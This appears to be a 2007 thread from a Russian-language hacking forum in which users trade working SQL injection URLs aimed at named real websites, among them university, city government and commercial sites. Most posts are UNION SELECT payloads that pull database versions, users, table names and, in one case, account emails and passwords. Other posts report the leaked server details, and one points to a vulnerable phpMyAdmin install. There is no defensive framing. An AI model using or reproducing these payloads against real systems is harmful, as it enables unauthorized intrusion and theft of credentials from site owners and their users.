SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. 1NtR0

    1NtR0 Elder - Старейшина

    Joined:
    14 Apr 2007
    Messages:
    235
    Likes Received:
    89
    Reputations:
    35
    http://www.airspirit.org/displayimage.php?id=1+union+select+1,2,3,4,5/*
     
  2. Eng1nE

    Eng1nE Elder - Старейшина

    Joined:
    18 Feb 2007
    Messages:
    23
    Likes Received:
    47
    Reputations:
    2
    http://shirley.ru/cat.php?id=-1+UNION+SELECT+user(),2/*
     
  3. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Ты бы раскручивал до конца :)
     
  4. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    NOmeR1
    А смысл?

    до конца это рут на серваке.
     
  5. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    [cash] он типа не просто подбор столбоц, а до раскрытия данных
     
  6. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    *.aero :)
     
    #2766 NOmeR1, 24 Jul 2007
    Last edited: 24 Jul 2007
  7. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Code:
    http://cartoons.sev.com.au/index.php?catid=-1+union+select+1,username,3,password,5,version(),7,8,9,10+from+user+limit+1,1/*
     
  8. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    Code:
    http://www.spu.edu/news/enews/tothepoint.asp?id=@@version--
    http://www.spu.edu/news/enews/tothepoint.asp?id=(select%20system_user)
    
    Code:
    http://www.ncat.edu/~artsnsci/ExpandNews.php?Index=1'%20or%201=-1%20union%20select%201,2,3,version(),user(),6/*
    
     
  9. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    4.1.22-standard
    qmeca_db
    qmeca_cv@localhost
     
    2 people like this.
  10. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    как всегда((( рут на локалхосте ((
    [email protected]
    jcomm
    4.1.22-log
     
  11. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Code:
    http://www.vipcamera.net/?go=catalog&cid=17&gid=-1'+UNION+SELECT+USER(),DATABASE(),VERSION()/*
     
  12. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    www.gaithersburgmd.GOV

    Code:
    http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=@@version--
    http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(select%20system_user)
    
    Code:
    http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(SELECT TOP 1 EMAIL FROM ACCOUNTS)--
    http://www.gaithersburgmd.gov/poi/easy_print.asp?POI_ID=309&POI_TYPE=12&id=(SELECT TOP 1 PASSWORD FROM ACCOUNTS)--
    
    далее =>
    http://www.gaithersburgmd.gov/apps/myGaithersburg
    &
    http://alert.gaithersburgmd.gov
     
    1 person likes this.
  13. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    http://provodka.ru/news.php?part=4&id=-669+union+select+1/*
     
  14. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    5.0.33-log
    itmedia3
    itmedia3@localhost



    4.1.20
    gented_db
    [email protected]



    4.1.21-standard-log
    odimcom_dbodimhost1
    odimcom_dbuodimh@localhost
     
    #2774 NOmeR1, 25 Jul 2007
    Last edited: 25 Jul 2007
  15. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    www.mockva.ru - Недвижимость =\

    Code:
    http://www.mockva.ru/search.php?sr_id=-1+union+select+1,2,3,4,5,6,7,concat(version(),0x3a,user(),0x3a,database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

    www.mwd.hartford.edu


    Code:
    http://www.mwd.hartford.edu/news.php?id=-12+union+select+1,2,concat(user(),char(58),version()),4/*
     
    #2775 [53x]Shadow, 26 Jul 2007
    Last edited: 26 Jul 2007
  16. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Кроме этого, на серве в http://rus-opt.ru/phpmyadmin/ стоит дырявый предырявый phpMyAdmin 2.6.4-pl1, подвержен уязвимости удалённого или локального инклудинга.
     
  17. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    http://www.fullthreadahead.com/classes/index.php?id=-100+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+25,1/*
     
  18. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    gougle.ru
    Code:
    http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),database(),version()),4,5,6,7/*
    Путег нашли:
    Code:
    /home/gougle/public_html/hotcd.php
    А прав нету =)
    Code:
    http://www.gougle.ru/hotcd.php?cd_id=-7287+union+select+1,2,concat_ws(0x3b,user(),database(),version()),4,5,6,7+from+mysql.user/*
     
  19. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.socket.net/customer/newsletterview.php?id=-74+union+select+1,2,3,4,VERSION(),6/*
    Code:
    http://www.best-credit-card.biz/card-offer.php?id=-1214+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,VERSION(),62,63,64,65,66,67,68,69,70,71,72,73,74/*
     
    #2779 SWAT, 26 Jul 2007
    Last edited: 26 Jul 2007
  20. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    И
    Но в последнем при запросе с order by все в норме, а если
    То вылазает ошибка в sql синтаксе
     
Thread Status:
Not open for further replies.